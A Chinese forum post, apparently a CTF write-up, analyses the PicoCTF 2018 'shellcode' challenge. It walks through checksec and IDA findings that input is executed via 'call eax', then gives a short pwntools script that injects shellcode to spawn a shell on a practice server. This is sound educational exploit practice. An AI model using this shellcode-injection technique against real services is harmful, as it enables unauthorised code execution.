找回密码
 立即注册
首页 业界区 安全 PWN手的成长之路-04-PicoCTF_2018_shellcode

PWN手的成长之路-04-PicoCTF_2018_shellcode

数察啜 2025-9-29 21:33:00
1.png

先 nc 连接服务器,交互一下看看有什么效果。发现是让我们输入一个字符,之后程序再打印出来。
2.png

file 查看文件。32位的 ELF 可执行文件。
3.png

checksec 查看文件安全属性。没开任何保护。
4.png

NX 保护未开启,表明栈内存可被注入并执行任意机器码(shellcode),符合经典栈溢出利用的条件。此类漏洞通常需构造包含 /bin/bash 字符串的 shellcode 以获取交互式 shell 。
IDA打开此文件。因为代码被混淆了,导致无法反编译成伪代码,所以需要逐条分析汇编指令。
5.png

看 main 函数旁边看到了一个 vuln 函数,查看。发现了 gets 高危函数。
6.png

仔细查看 main 函数。
7.png

程序将用户的输入数据存储到 edp+var_A0 处,并通过 lea 将输入缓冲区地址加载至 eax 寄存器,随后作为参数传递给 vuln 函数,vuln 函数内存在关键指令 call eax,表明程序会直接跳转执行 eax 指向的地址,推测此处可能会存在任意代码执行漏洞。
8.png

反编译 vuln 函数,猜测 a1  会被加载到 eax 寄存器中。
9.png

因此用户输入的数据最终会被 call eax 执行因此需要构造一段机器码形式的shellcode,直接注入到栈中实现任意代码执行。
exp 构造思路:
构造包含 /bin/bash 字符串及系统调用执行的 shellcode,通过输入将其注入栈中,并利用call eax 触发执行,之后get shell。
  1. from pwn import *  
  2.   
  3. r=remote('node5.buuoj.cn',26081)  
  4. context.log_level='debug'  
  5. context.arch='i386'  
  6. context.os='linux'  
  7. shellcode=asm(shellcraft.sh())  
  8. print(shellcode)  
  9. r.send(shellcode)  
  10. r.interactive()
复制代码
最终得到交互式 shell
10.png


来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

相关推荐

您需要登录后才可以回帖 登录 | 立即注册